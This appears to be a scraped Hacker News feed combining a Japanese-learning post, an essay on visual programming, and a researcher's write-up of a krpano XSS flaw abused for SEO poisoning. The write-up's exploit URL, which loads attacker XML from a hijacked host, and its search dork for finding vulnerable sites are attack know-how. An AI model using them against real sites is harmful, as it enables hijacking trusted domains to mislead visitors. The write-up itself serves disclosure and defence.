Anki seems to be a religion to most people: on one hand a radiant beacon of light in the language learning journey, and on the other a vengeful and hateful deity. Anki is an app built only for spaced repetition flash cards, though it doesn’t come with any cards at first. The app is free for Mac, PC, and web, but costs money on mobile as a one-time fee that syncs across all of your devices. I’m going to be honest here: I don’t like it. The settings are a nightmare to maneuver, the process of finding usable decks is frustrating, and the way people talk about the app is like… off-putting. There are modern day snake oil salespeople all over the place claiming their Anki deck will get you fluent in Japanese in six months or whatever — obviously untrue. So why is it here?

    The short version is that I can see the potential of how Anki will help me in the long term. For example there are Chrome extensions which will tie into your catalogue of Anki decks and highlight words you know along with words you don’t while watching shows on Netflix or videos on YouTube, allowing you to easily create new flashcards based on the content you’re actually watching. While I’m way too early on in the process to start doing this, I thought it would be helpful to get acclimated with how Anki works via a low-lift deck that I can check in with daily. For that I’ve landed on this free deck by JLab which incorporates elements of the previously mentioned Tae Kim Guide to Japanese Grammar while also incorporating vocab and listening + comprehension practice. As an aside, the video announcing this deck has the single most positive YouTube comment section I’ve ever seen — seems like a good sign!

    What’s Up Next?

    Aside from using the above resources every day, I’m trying out a few things here and there to see if they’re helpful and additive tools. One important element of this is finally returning to the Genki textbook after all these years, but also pairing it with some helpful YouTube playlists to make the lessons a bit easier to parse. This one by Game Gengo is wonderful for adding helpful context to the vocab taught in the book, and this one by TokiniAndy seems solid for grammar. It’s helpful to remember that no one tool will get you to fluency, and I’ve noticed that repeating similar concepts across multiple tools is helping reinforce them.

    While I’m on the topic of Game Gengo, he also has some great recommendations for games to play at all levels and will do in-depth guides for how to play each game in Japanese. Because of him, I picked up a Japanese copy of Dragon Quest XI for Switch so I can (very) slowly make my way through one of my favorite games of all time again — this time as a tool for learning.

    On the listening side, I’ve been spending a lot of idle time while commuting or cleaning the house listening to Nihongo Con Teppei for Beginners and YuYu Japanese, two podcasts with extremely basic Japanese speech and hundreds upon hundreds of episodes in the backlog. I’ve been listening to Teppei’s first few episodes repeatedly over the past two weeks and the realization that I’m starting to understand them in bits and pieces was one of the most shocking developments over the past 14 days. 

    A few more things to shout out here before I wrap up: 

    • Human Japanese - A textbook for your phone with helpful audio by native speakers and simple quizzes as you make your way through.

    • Shashingo - A game for learning Japanese by walking around a tiny Japanese neighborhood and taking photos of objects to create flashcards. I like it!

    • Speak Japanese Naturally - A Youtube channel where someone just vlogs her day and narrates it in Japanese while pointing out objects and having casual conversations with people in daily life. 

    • Jisho - An extremely good web-based Japanese dictionary.

• Music - It’s music! I’ve specifically been listening to a lot of city pop albums recently — a phase I get into pretty much every time I can tell winter is starting to recede and make way for spring. This time around, I’ve been spending a lot of time looking up lyrics and trying to better comprehend what’s being said instead of just letting the vocals wash over me.

And that’s it! It’s a pretty exhaustive list, but that’s because learning a language is hard! I’m under no illusions that I’ll know how to speak by the time my honeymoon rolls around, but I am hopeful that I’ll have solid habits and a working knowledge of the most basic words needed for low-touch interactions on a daily basis.

    Good luck to you, too. I hope this helps cut through the noise a bit.

    頑張って。

    ]]>
    https://wavelengths.online/posts/how-im-learning-japanese-14-days-in hacker-news-small-sites-43198628 Thu, 27 Feb 2025 21:19:39 GMT
    <![CDATA[OpenCloud 1.0]]> thread link) | @doener
    February 27, 2025 | https://opencloud.eu/en/news/opencloud-now-available-new-open-source-alternative-microsoft-sharepoint | archive.org

    Unable to retrieve article]]>
    https://opencloud.eu/en/news/opencloud-now-available-new-open-source-alternative-microsoft-sharepoint hacker-news-small-sites-43198572 Thu, 27 Feb 2025 21:13:42 GMT
    <![CDATA[Visual programming is stuck on the form]]> thread link) | @iamwil
    February 27, 2025 | https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ | archive.org

    Underlying great creations that you love—be it music, art, or technology—its form (what it looks like) is driven by an underpinning internal logic (how it works). I noticed this pattern while watching a talk on cellular automaton and realized it's "form follows function" paraphrased from a slightly different angle. Inventing a form is a hard task, so you must approach it obliquely—by first illuminating the underlying function.

This made me realize something crucial about visual programming: it’s stuck on form, rather than letting form follow function. Visual programming has long been trapped in the node-and-wires paradigm because its designers are overly fixated on form, neglecting the underlying function that should drive it. So as a whole, the field is stuck in a local minimum. How can we break out of it, and how can we find a function for the field that underpins the form?

    A clue from CellPond

I was watching a talk about CellPond–a visual programming language that expanded my expectations for cellular automata–and was struck not just by the presentation but also by a specific quote from Lu Wilson. And that's given that I'd already seen my share of the Game of Life by John Conway and read lots of A New Kind of Science by Stephen Wolfram.

    But even though Lu Wilson spent the last 10 minutes showing you the fantastic visuals, none of that was the point. The actual tasty result is that there is a virtual machine with only four operations underlying the CellPond system. And these four operations correspond with memory operations we're familiar with in CPUs: read, write, allocate, and deallocate. To me, that connection was utterly surprising. The grid of patterns (form) was informed and driven by the underlying virtual machine (function).

    "I think if you were to learn from CellPond, you'd take away not just the UI—but you can take the UI too if you want. I was very surprised by this because, in all my reading of past solutions to these problems, they were all about the high-level user interface; they were about the UI. I thought I'd have to build layers upon layers of UI, but really, as soon as the low-level stuff was sorted out, the UI just figured itself out."
    - Lu Wilson (🐤 · 🦋)

    I wondered: how did Lu Wilson come up with the underlying function? It seemed magical. This puzzling revelation made me realize it wasn’t just about the UI—there was a deeper principle at play.

    Form follows function

    In the subsequent months, I kept turning it over in my head. The key lay with the opening quote.

    When you figure out the low-level stuff, the UI all falls into place.

    It wasn't until a drive while I was listening to Paul Graham's A Taste for Makers that I made the connection. The CellPond talk was a demonstration of the oft-repeated adage of "form follows function." Here's the relevant excerpt:

    In art, the highest place has traditionally been given to paintings of people. There is something to this tradition, and not just because pictures of faces get to press buttons in our brains that other pictures don't. We are so good at looking at faces that we force anyone who draws them to work hard to satisfy us. If you draw a tree and you change the angle of a branch five degrees, no one will know. When you change the angle of someone's eye five degrees, people notice.

    When Bauhaus designers adopted Sullivan's "form follows function," what they meant was, form should follow function. And if function is hard enough, form is forced to follow it, because there is no effort to spare for error. Wild animals are beautiful because they have hard lives."
    - Paul Graham A Taste for Makers

    Honestly, I had never thought much about "form follows function." It seems obvious enough when you hear it for the first time. Sure, given an interface, why else would it express anything other than its purpose? It would seem counterproductive otherwise.

    It wasn't until I was forced to invent a form did I really understood what it meant. The adage "form follows function" is for those tasked to invent the form, not for when you're given it. In my own words, it's this:

    If a design is any good, how something looks, feels, and works is a naked expression of its function, its algebra, its rationality–its underlying nature. To design a form, you should not just come up with it out of thin air. You have to attack the problem obliquely and work out its function first. Once the function–the underlying nature, internal consistency, and algebra–is worked out, the form will fall out as a consequence of it.

    Three faces of function

    What I mean by "underlying nature" isn't that it exists independently of human creation; rather, every design is embedded in an environment that shapes its intrinsic properties. The function of anything useful is always in the context of its environment. When we understand the context of a well-designed thing, we understand why it looks the way it does. An animal form reflects its adaptation to the ecological niche in its environment.

    By "rationality", I mean some kind of internal consistency. The function of something well-designed will have a certain repeated symmetry. Given a choice of design, it'll consistently use the same thing in as many scenarios as possible. Good game design enables a single item to serve multiple functions. The gravity gun in Half-Life 2 enables players to pick up and launch objects. It's used for turning environmental items into weapons, solving physics-based puzzles, and for navigating hard-to-reach areas. In Minecraft, the water bucket can extinguish fires, create waterfalls for safe descent, irrigate farmland, and serve as a barrier against certain enemies.

    By "algebra", I mean a set of rules about how a design's components compose. Most games have a physics engine that computes how objects in a game interact with each other in space. It's a "movement calculator." Legend of Zelda: Breath of the Wild additionally has a chemistry engine that it uses to compute how different materials interact with each other. It's a "state calculator."

    In summary, function represents the intangible structure governing the relationships, interactions, and contextual fit of a design’s underlying components. A form can't exist outside of its function, and its function is shaped by its environment. We can observe and interact with the form directly, but not its function. We can exist in the environment, but the function is invisible to us without a lot of work to infer it.

    A form not informed by function feels disjointed, inconsistent, and frustrating. Without an underlying function to underpin the form, the shape of form is simply at the inconsistent whims of the designer. Functions keep designers honest about the purpose of form: in service of function. Of course you can explore and play with form independent of function, but that's the jurisdiction of art, not design.

    To invent a form, start with the function

    "Form follows function" is advice for people making something, especially those whose work has a very visible interface facing the end user. To invent a form, start with the function. But it's easy to make errors of two kinds, even if you already know this in your head.

    The first kind of error is to pursue form without considering function. Instead, you must ignore the form, at least initially, and focus on figuring out the function first. This is largely due to the intangible nature of function. It's an easy mistake to focus on form, even far into your creative career.

    This mistake is understandable. Whenever people interact with anything, their initial contact is the interface—the bridge between user and design. For anyone new to something, it's natural to start by engaging with that interface, because it's what they're most familiar with. So when they turn around to make something in that domain, they start with the interface, the form. You can see this readily: new creatives in a field start by copying the masters before finding their own voice.

It's also understandable because function is largely more abstract and more intangible than form. It's harder to get a grip on something amorphous, and you may have to start off with something concrete. It can be part of the process to draw up concrete examples first. In fact, when confronted with an unfamiliar domain, this can be quite productive in getting a handle on it. But it can be easy to forget to take a step back and ask: "what is the common underlying logic or abstraction to all these examples?" When you are able to take a step back, you're using the concrete examples as a stepping stone to figuring out the underlying function.

    The error of the second kind is pursuing function without considering the user. As a warning for those that lean too far on the other side of the precipice, this doesn't mean you can ignore the end user when figuring out the function. If we could represent the utility of the underlying function as a vector, it would still need to point in the direction of the user. The underlying function must support and give context to the visible form built on top. Both are built so the direction and magnitude of their utility vector can support the user in the direction of their goals.

    Too many back-end engineers misinterpret 'form follows function' as a license to design arbitrary database tables and APIs, assuming that the front end will compensate. That's how we get terrible interfaces where the end user needs to be aware of the data model to use it effectively, like Git.

    When it comes to visual programming, I think it's stuck in the error of the first kind, with its focus on form.

    Visual programming is not just node-and-wires

    Node-and-wire diagrams have become a lazy default. Most visual language designers never ask whether those boxes and arrows genuinely help programmers. It’s a classic case of letting form precede function.

    When one looks through the Visual Programming Codex, it's obvious an overwhelming majority are based on the node-and-wires model. Not just that, but there are mostly only two variations:

    1. The nodes represent data, and the wires represent functions
    2. The nodes represent functions, and the wires represent data shunted between functions.

    Did many of them settle on it because it's the best visual representation to help aid the process of programming? Or did they use it because they're mimicking an existing form?

    I think node-and-wires is popular because visual programming designers make the fundamental assumption that the underlying nature and logic of programming is just traditional textual programming. If that's your assumption, then you'd naturally think all you have to do is find visual representations for existing textual language constructs. Hence node-and-wires is the form you get when you take pure functions as the underlying logic underpinning the form.

At first glance, node-and-wires seems like a good fit. The wires going into a node are like the input parameters of a pure function, and the wires going out are like the output value. But what about differentiating between the definition of a function versus calling it? Often in node-and-wires visual languages, there's no separation. The definition is the application. What about passing around functions or thunks? Much of the power in pure functional programming lies in higher-order functions, and I haven't seen a very good node-and-wires representation of that. After decades of trying, most pure functional programming is still largely expressed in text. To me, that's damning evidence against the practice of using node-and-wires to model functions. Text is still the better form for expressing the underlying logic of functional programming.

Imperative programming with node-and-wires fares no better. A loop in LabVIEW gives no advantage or clarity over writing it in text. Seeing the totality of a sequence of steps in parallel in a circuit-like diagram doesn't solve the fundamental problem with imperative programs; it doesn't help the developer understand combinatorial state explosions or state changes over time.

I think where node-and-wires have provided the biggest advantage is in specific domains in which a) there's massive value in examining the intermediate data and values between transformations and b) there's a well-known visual representation of that intermediate data. This has been demonstrated in visual languages like Unreal Engine's Blueprint for game programming and shaders, and Max/MSP for sound synthesis in music. But these have been limited to these narrow domains. Visual programming has not found a foothold in general-purpose programming domains.

    Modeling problems

    What then, if not node-and-wires? The aim here is to uncover an alternative underlying logic—one that can more effectively drive the form in visual programming. How would you go about finding another underlying function in "form follows function" if not the current programming paradigms we know? I think this is the wrong question. Although correct in direction and spirit, I think a better question is: how should we model problems that can leverage the computational power of our visual cortex?

    We write programs primarily to model and solve real-world problems. We go through the exercise of encoding the problem model in programming languages, because we can automate the generation of solutions. And the reason why we keep banging on the visual programming door is because we understand intuitively that our visual cortex is an under-leveraged power tool.

    The human visual cortex is a powerful pattern recognition apparatus. It can quickly compare lengths, distinguish foreground from background, recognize spatial patterns, and other amazing feats of perception, all at a glance. We leverage it in data visualizations to make sense of large quantities of data, but we haven't been able to leverage it to make sense of computational systems.

    ❓"Imagine what a visual programming language would look like if it was able to leverage the power of the human visual cortex" For the record, I don't think this is it.

    If we had a visual programming language that could leverage the human visual cortex, then at any zoom-level of abstraction, at a glance we could understand the overall structure of the program as it relates to the domain at that level of abstraction. And if we were looking at a running program, then we could get an idea of the overall state and process. Yes, we have bespoke visualizations of running programs in the form of metrics and dashboards. But we don't have a universal visual language to represent the structure or state of a program that applies to different programs.

    What about text? Aren't textual glyphs a kind of visual language? Not in the way I mean. For text to be considered a visual programming language, it'd have to leverage the human visual cortex at different zoom-levels of the program. Certainly, with syntax highlighting we leverage the visual cortex and use color to distinguish between different syntactical elements. This counts. But we only get this at the level of a function. It doesn't apply when we zoom out to the overall structure of the code base. And there's certainly no zoom-out level in which we get visual understanding at the level of the problem domain.

    The closest thing I can think of that might fit the bill is APL and its ilk. By condensing operators into single characters, sequences form idioms. Just as we recognize whole words rather than individual letters, idioms allow us to comprehend entire operations without parsing each symbol. So as you zoom out of the code, you can see the meaning of the code by identifying common idioms. Strangely, it seems many APL environments don't feature syntax highlighting.

    So if visual programming is to be useful, I think the angle of attack is to find a way to model problems, and this might not be the same way that we model problems in textual languages–even if the underpinning implementation is all lambdas and Turing machines. So how do we model problems?

    Entities and relationships

    I'll say up front, I don't know what modeling problems should look like. Nonetheless, it seems there are two main aspects for any system we're interested in:

    1. visually representing the entities in a problem domain
    2. visually representing the entity relationships.[2]

Regardless of the paradigm (imperative, object-oriented, functional, or logical), there are both "entities" (structs, objects, compound values, terms) and "how they relate" (imperative processes, messages, functions, rules and predicates). If I had to take a stab at it, I'd start here.

Of the two, representing the different entities in a problem domain seems more amenable to visual programming because they're nouns. Most of the things we see around us are nouns. Hence, we can imagine that inert data representing entities would have a canonical visual representation. But even then, entities often have far more attributes than we might want to visualize at a time to understand their purpose and behavior. How do we choose which attributes are important to show? And what should be the visual form for those attributes?

    The two questions are related, but to drive the point home, I'll focus on the second one. If we have some struct with two attributes in some generic language, how would we visually represent them?

struct Foo {
  bar: f64,
  baz: f64,
}

    We might think a universally useful representation of a collection of these instances is two histograms: one for bar and one for baz. For any given instance, its corresponding value could be highlighted on the histogram.

Is this useful? The answer depends on the task at hand. There's no one-size-fits-all visualization of entities. What if I told you bar is an x-coordinate and baz is a y-coordinate? Now, perhaps a more fitting visualization is a scatterplot where each instance is represented as an x. We put bar and baz in a spatial relationship to see if our visual cortex can recognize a pattern.

In the histogram visualization, I can't use my visual cortex to discern that the relationship between bar and baz traces out a flower. In the spatial canvas visualization, however, I can easily see the flower trace, because putting bar and baz in a spatial relationship creates a mapping that makes an affordance for my visual cortex.
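
To make that concrete, here's a minimal sketch (a hypothetical dataset of my own, assuming numpy and matplotlib are available): the two per-attribute histograms hide the flower, while the scatterplot reveals it at a glance.

import numpy as np
import matplotlib.pyplot as plt

t = np.linspace(0, 2 * np.pi, 500)
r = np.cos(5 * t)                      # a five-petal rose curve
bar, baz = r * np.cos(t), r * np.sin(t)

fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(9, 3))
ax1.hist(bar, bins=30); ax1.set_title("bar histogram")
ax2.hist(baz, bins=30); ax2.set_title("baz histogram")
ax3.plot(bar, baz, "x"); ax3.set_title("bar vs. baz")  # the flower pops out
plt.show()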

    This only worked because there was a spatial relationship between bar and baz, especially if I know they represent x and y coordinates. We couldn't just look at the data and easily discern what visualization to use. The label and the intention of the user also give meaning to what visualization is best suited for an entity. Hence, I think there's no one-size-fits-all visualization for entities. There's no single mapping of attributes to visualizations that makes sense, unless the user's intention and goals remain fixed.

Besides entities, every program also encodes relationships between those entities. How do we visually represent their relationships in a way that's illuminating at a glance without devolving into an illegible spaghetti mess? Relationships can be harder to model because they're typically invisible to us; they're often only inferred.

    Like the example with representing entities visually, representing relationships visually is likely to depend on both the goals of the user as well as the meaning of the entities at hand. I suspect a good visual representation of the relationship between two tables in a query is going to be different than a good visual representation of the relationship between two pieces of middleware in a web stack. However, I do think we can do better than a line.

The go-to representation of a relationship is the line or the arrow, connecting two things on the canvas. The trouble with lines is that they don't scale with the visual cortex. After a couple dozen lines, we lose track of any sense of the overall relationships between entities. But lines don't have to be the only way. The visual cortex also relates visual elements if they have the same color or if they're spatially clustered together. As the previous plot of bar and baz showed, relationships can be encoded spatially, arranged so that they reveal themselves without drawing lines and arrows everywhere.

As before, it's hard to draw any generally productive conclusions on how best to visually represent relationships between entities without knowing the goal of the user as well as the meaning behind the entities and relationships we're trying to represent. The only point I'm trying to drive home is that we have more tools at our disposal besides lines and arrows, because the visual cortex is perceptive and discerning about colors, groupings, and motion. We typically use these visual elements haphazardly, if at all, rather than deliberately leveraging them for understanding. And that's just in graphic design and data visualization. They're completely overlooked in program structure, debugging, and domain problem modeling.

At this point, those who hear "entities and relationships" might be drawn to ask: isn't this just object-oriented programming? It's true that object-oriented thinking trains you to identify entities in the problem domain and model their relationships through method calls and messaging. However, object-oriented programs are littered with private state whose effects are observable from the outside, making it hard to reason about program behavior. What I'm saying is orthogonal to, and doesn't invalidate, what we've learned about structuring programs in the past three decades. To sum up, I'm saying the unit of representation for visually representing programs may not be the function and its input and output parameters, as node-and-wire visual programmers are likely to assume. It might be something else, something that can leverage the power of the visual cortex.

    Computation is figuring out the next state

    Modeling problems as entities and their relationships is only half the equation. By only modeling entities and their relationships, we've only described a static world. We can do that already without computers; it's commonly done on whiteboards in tech companies around the world. Every time we go up to the whiteboard with a coworker to talk through a problem, we're trying to leverage the power of our visual cortex to help us reason through it. But unlike our textual programs, whiteboards aren't computational.

    If whiteboards were computational, they might show how the state of the problem changes over time, or how it changes in response to different external inputs or effects. Thus, the question is, how do we visually represent how the system state should evolve over time or in response to external inputs? [1]

Cellular automaton systems typically express computation through rulesets. Rulesets are typically expressed as a pure functional transformation between the current state and the next state. Taking rule 110 in a 1D cellular automaton as an example: the state of each cell in the next row depends on the three cells above it. Given the three-cell pattern above, the rule dictates what the cell in the next line should be. You can see this as a kind of β-reduction, substituting symbols with other symbols until we can substitute no further, with the resulting value as our answer.

    The famous rule 110 in 1D cellular automaton. This rule is Turing Complete!
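
To make the ruleset-as-mapping point concrete, here's a minimal sketch of rule 110 in Python (my own illustration, not from the essay's sources). The entire rule is literally an eight-entry lookup table from three-cell neighborhoods to the next cell:

# rule 110: each three-cell neighborhood maps to the next cell's state
RULE110 = {
    (1, 1, 1): 0, (1, 1, 0): 1, (1, 0, 1): 1, (1, 0, 0): 0,
    (0, 1, 1): 1, (0, 1, 0): 1, (0, 0, 1): 1, (0, 0, 0): 0,
}

def step(cells):
    # each next-row cell is looked up from its three parents (wrapping at edges)
    n = len(cells)
    return [RULE110[(cells[(i - 1) % n], cells[i], cells[(i + 1) % n])]
            for i in range(n)]

cells = [0] * 31 + [1]        # start with a single live cell on the right
for _ in range(16):
    print("".join("#" if c else "." for c in cells))
    cells = step(cells)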

As the CellPond talk at the top of the page points out, rulesets for more complicated behaviors, like trains on tracks, suffer a combinatorial explosion of rules. One of CellPond's innovations was to have rulesets that represent (or generate?) groups of rulesets, so that visually expressing the rulesets remains tractable for humans.

But pure functions are just mappings. Any pure function can be replaced by an equivalent (possibly infinite) table of key-value pairs. Rulesets are just explicit mappings of inputs to outputs. Hence, if rulesets are to be tractable, we must be able to express not just how a single current state maps to the next state, but how entire groups of states map to a next state.

    We have familiar mechanisms in textual programming to express a selection of groups of input states in a succinct way. We have boolean logic in if expressions. We have maps and filters. We have select and where clauses in SQL queries. But we have no universal and composable ways of expressing this selection of previous states and mapping them to next states. Additionally, we don't have universally recognized ways of expressing this mapping from groups of inputs to outputs for state types other than a grid of cells.
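
As a toy illustration of what selecting groups of states could look like (a sketch of my own; all the state fields are hypothetical), predicates can stand in for whole regions of the state space, so the mapping never has to enumerate each concrete state:

# each rule pairs a predicate (selecting a group of states) with an update
RULES = [
    (lambda s: s["fuel"] == 0,          lambda s: {**s, "mode": "stalled"}),
    (lambda s: s["speed"] > s["limit"], lambda s: {**s, "speed": s["limit"]}),
]

def next_state(state):
    # the first matching rule decides the next state; otherwise it's unchanged
    for matches, apply in RULES:
        if matches(state):
            return apply(state)
    return state

print(next_state({"fuel": 0, "speed": 10, "limit": 60, "mode": "driving"}))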

    A different way forward

Certainly, it's possible that the multi-dimensional aspects of a codebase would be quite hard to represent in their entirety visually. But I don't think it's a stretch to say that we lean pretty hard on the symbolic-reasoning parts of our brain for programming while the visual-reasoning parts of our brain are under-leveraged.

    Visual programming hasn't been very successful because it doesn't help developers with any of the actual problems they have when building complex systems. I think this is a result of ignoring the adage "form follows function" and trying to grow a form out of traditional programming paradigms that fail to provide good affordances–the utility vector is pointing the wrong way–for those actual problems in complex systems. To make headway, I think we should focus on discovering underlying logic and function of how to model problems visually on a canvas–not just the entities, but also their relationships. In addition to modeling problems, we also have to discover how to model transformations and transitions of state, so our models are also computational.

    We have the hardware: our visual cortex is a powerhouse for pattern recognition and spatial reasoning. We just don’t have the right computational grammar to feed it. If we want a visual programming breakthrough, we have to leave the legacy of text-based paradigms behind and unearth a new kind of function—one that only makes sense visually. Once we do, the right ‘form’ will follow so obviously, we’ll wonder why we waited so long.


[1] One way is with visual rule sets. This almost feels like declarative or logic programming. But as the CellPond talk at the top of the essay pointed out, unless you have a representation of rule sets that can be expanded, you suffer combinatorial explosion.

    [2] Depending on who you are, this can sound either like object-oriented programming or category theory.

    ]]>
    https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ hacker-news-small-sites-43198547 Thu, 27 Feb 2025 21:11:04 GMT
    <![CDATA[Mass Website Exploitation via Virtual Tour Framework for SEO Poisoning]]> thread link) | @StriverGuy
    February 27, 2025 | https://olegzay.com/360xss/ | archive.org

How I Accidentally Uncovered One of the Most Exploited XSS Vulnerabilities Online

    My story begins in a way that many readers of technical blogs might find familiar—just another uneventful evening alone at the computer. For purely educational purposes, I opened a Chrome incognito window, went to Google, and typed the word “porn.” Thanks to my ongoing research in this area, I’m quite familiar with the usual search results. But this time, something unusual caught my eye—a new website appearing in the third row, listed under Yale University’s domain with the title: “++[S*X@Porn-xnxx-Videos!…] Tamil sexy student.” It piqued my curiosity, but not for the reasons you might think.

    Did Yale University Enter the Porn Industry?

    I was almost certain the website had been hacked, but I still wasn’t sure how. My first thought was a subdomain takeover—a common attack where an abandoned CNAME record pointing to an unused asset gets hijacked by an attacker to host malicious content under the original domain. I had previously explored this technique in my research at Guardio, where I coined the term “Subdomailing”.

    To test my theory, I clicked the link to see where it would take me. The page initially loaded what looked like a legitimate platform but quickly redirected me to a random porn ad.

    https://virtualtour.quantuminstitute.yale.edu/?id=yuxs&xml=https://staging-prep-cms.scouts.org.uk/lnk/video/?video=video-xx-indain-girl-xxx-xxxxxxx-xvid-60159.html

    Examining the original URL, a few things stood out: the subdomain name hinted that the site was related to a virtual tour, and an xml parameter contained a suspicious-looking URL—something that definitely needed a deeper look.

    Curious, I tried opening the same URL again but without the parameters—and suddenly, I found myself inside Yale’s Quantum Mechanics Institute. Took a quick tour, impressive place. If you're into quantum computing, worth a look. But honestly, I never really got superposition—how can a bit be both 0 and 1? Seriously, how does that work?? 😂

    …Anyway, back to the point.

    Reversing the Payload

    The xml parameter was clearly the key factor, so I considered the possibility of an open redirect. I modified the parameter value to https://www.example.com, expecting a redirection—but instead, the page threw an error:

    At that point, I knew this was more than just a simple redirect. I hadn’t even checked the original xml parameter yet—and when I did, one thing stood out: the URL belonged to the official UK Scouts website, which seemed suspicious. A quick DNS check confirmed my suspicion—the subdomain had been hijacked through an abandoned Azure account, just as I had explained earlier.

    Then, I examined the response contents of the URL to see what was inside:

    The response was an XML document with an onloaded event containing an eval function executing a Base64-encoded payload—one of the most classic indicators of a malicious XSS (Cross-Site Scripting) payload.

    At that moment, I felt a rush of excitement—this was the first time I had found an actively exploited XSS in the wild. Don’t get me wrong—I strongly oppose malicious activities like this, but the researcher in me couldn’t help but celebrate 😂.

    Beyond the XSS, the main tag <krpano> revealed the underlying technology powering my virtual tour through the quantum institute.

💡 Krpano is a popular framework used to host 360° images and videos, enabling the creation of interactive virtual tours and VR experiences. It supports various formats, including gigapixel images and fisheye projections, and allows customization through XML and JavaScript.

    That meant the XSS was either in the framework itself or in the website’s implementation.

    Curious to understand what the payload actually did, I decoded it:

    Nothing particularly sophisticated stood out in the script—except that it fetched a target URL from yet another stolen asset, this time volvo.com, and used the id parameter to identify the ad campaign.

    At this point, I hadn’t even fully started my investigation, and I had already found three abused assets from three major organizations. That’s when I realized—this wasn’t just some random hacker selling services on Telegram. I was dealing with a serious actor—someone with a massive bank of stolen assets and a well-organized operation.

    Zero Day or One Day? 

    Reversing this XSS was a fun ride. At first, I assumed the external XML loading was an intended feature of the Krpano library and that the vulnerability lay in how the XML was parsed. So, I dived into debugging the obfuscated library, searching for the source of truth. After 30 minutes of digging, I finally did what I should’ve done from the beginning—checked the documentation. And there it was:

• The XML onloaded attribute? A documented feature.
• The external xml parameter? A design choice - one that should be disabled in production.

    I came across a crucial configuration setting - passQueryParameter.

This setting controls whether query parameters from the hosting website are passed directly into Krpano’s configuration. The problem? For years it was enabled in Krpano’s default installation, meaning any attacker could inject arbitrary XML, leading to reflected XSS on any website that didn’t explicitly disable it.

    Digging deeper, I found CVE-2020-24901. The description matched exactly what I observed: reflected XSS caused by the passQueryParameter setting. While the original POC used different parameters, the xml parameter was also mentioned. So, was this a one-day? Yes. But somehow, it slipped past too many websites, as you're about to see.

    The Shoemaker's Children Go Barefoot

    In this Krpano forum thread, a user raised concerns about this CVE—a full year after its disclosure. Krpano’s developers downplayed the issue, claiming it was a case of misuse rather than a security flaw. However, they did mention that as of version 1.20.10, they restricted passQueryParameter to an allowlist in an attempt to prevent XSS.

    But here’s the problem.

    Explicitly adding the xml parameter to the allowlist still left the same XSS risk open, and this configuration remained available for use.

    And now, for the best part.

    While browsing Krpano's documentation, I noticed they hosted live examples of their 360° tour framework on their own website. Naturally, I checked their implementation… and guess what? They were vulnerable too.

    Once I cracked the technical side of the vulnerability, I shifted gears—I wanted to understand the bigger picture. How widespread was this campaign? How many other sites had been exploited? That’s when an idea hit me. Instead of chasing leads blindly, why not use my good old friend, Google Dorking?

    inurl:xml=https AND inurl:id=

And just like that, I opened Pandora’s box.

    The sheer scale of this campaign caught me off guard. With a couple of Google searches, I uncovered thousands of ads spread across 350+ exploited websites—and not just any websites.

    Government portals. Entire state websites. Top universities in America. Major hotel chains. News outlets. Car dealerships. Fortune 500 companies. All hijacked and repurposed as SEO tools to spread spam, ads, and shady promotions.

Most of these sites are very popular, drawing millions of visitors each month, and some had been hit multiple times, serving different types of ads.

    And it wasn’t just porn ads anymore. I found diet supplements, online casinos, fake news sites—every kind of sketchy ad we instinctively close without a second thought. But the real surprise? Some of these hijacked pages weren’t even pushing ads—they were being used to boost YouTube views.

    This wasn’t just a spam operation. It was an industrial-scale abuse of trusted domains.

    I also analyzed the xml parameter value. Some were the usual suspects: cheap, throwaway domains registered with privacy-shielded WHOIS info, making it impossible to trace the owners. But others? Hijacked subdomains of major websites.

    XSS for SEO Poisoning 

    Everything about this campaign screamed SEO pros. One of the biggest proofs was right at the beginning of this blog—where I showed how they pushed their ad to the third row in Google search results for one of the most searched terms in the world: "porn". Sure, leveraging Yale University’s domain played a big role in boosting credibility, but pulling off that level of ranking manipulation is still no small feat. 

In addition to that, the concept of using a reflected XSS for SEO promotion is nothing I’ve seen before, not at this scale. A reflected XSS is a fun vulnerability, but on its own it requires user interaction, and one of the biggest challenges is getting people to click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it.

These guys squeeze every last drop out of every website they compromise. Take Utah’s official website, for example—at the time of my search, it had over 100 indexed spam results.

    And keep in mind, my data was limited to Google Dorks, meaning they had likely indexed the same page with different ads hundreds of times beyond what I could see.

    They weren’t just injecting links—they were optimizing them:

    • Controlled the title, description, and preview image.
    • Used random strings in titles to make each result unique.
    • Added fake review counts and star ratings.

    I can’t accurately estimate how many clicks this campaign generated, but judging by its scale, millions wouldn’t be a stretch. 

    But there was still one question that kept bugging me… 

    For some reason, I always assumed that the best way to exploit an XSS was to directly attack the vulnerable website and its user base—stealing cookies, session tokens, or performing actions on behalf of users. However, in this case, all I found was JavaScript executing simple redirects and nothing more 🤔.

    Thinking logically, I came up with two possible reasons why they chose this approach:

    1. They're likely a shady ad firm, more interested in blasting ads everywhere than launching direct cyberattacks. This is probably their most effective monetization strategy.
2. They’re operating in a legal gray area—while their methods are unethical, they aren’t outright criminal. Stealing user data or launching full-fledged attacks would escalate the operation into something that attracts law enforcement and investigations. However, all they did was distribute ads.

    But then, while digging through the scraped websites, I stumbled upon something bigger—a website with over half a billion monthly visitors that was treated specially.

    CNN - More Than a Redirect

    This wasn’t just another case of a high-traffic website being compromised. What made it stand out? Clicking the malicious link didn’t redirect me elsewhere—it kept me right on cnn.com, landing on what appeared to be a legitimate CNN article. Same domain, same structure—except the content was in Turkish and the title was “Top Reliable Casinos Online.”

    Who wouldn’t trust an article hosted on CNN, especially when hunting for the most “reliable” online casino?

    This was a smoking gun—proof the attackers knew exactly what they had in their hands. Instead of a cheap redirect, which would be a waste, they embedded their casino promotion directly inside CNN’s domain, disguising it as a real article. They weren’t just hijacking traffic; they were weaponizing trust.

    Digging deeper, the xml payload was hosted on this “unsuspicious” domain "jqeury.store". The homepage on that domain served a list of links to multiple instances of the same CNN exploit, each serving different variations of the casino article.

    But it didn’t stop there. Some links also pointed to "geo.tv"–Pakistan’s largest news site. Opening them revealed the same trick—fake articles injected into a vulnerable endpoint, all promoting the same casino.

    Responsible Disclosure

    The people behind this campaign remain a mystery, but from what I’ve seen, many clues suggest it was run by an Arab group—based on the ads, patterns, and random breadcrumbs I found during my investigation. Either way, I couldn’t care less; that’s a problem for law enforcement. What I can do, however, is try to minimize the damage by reaching out to the biggest brands affected.

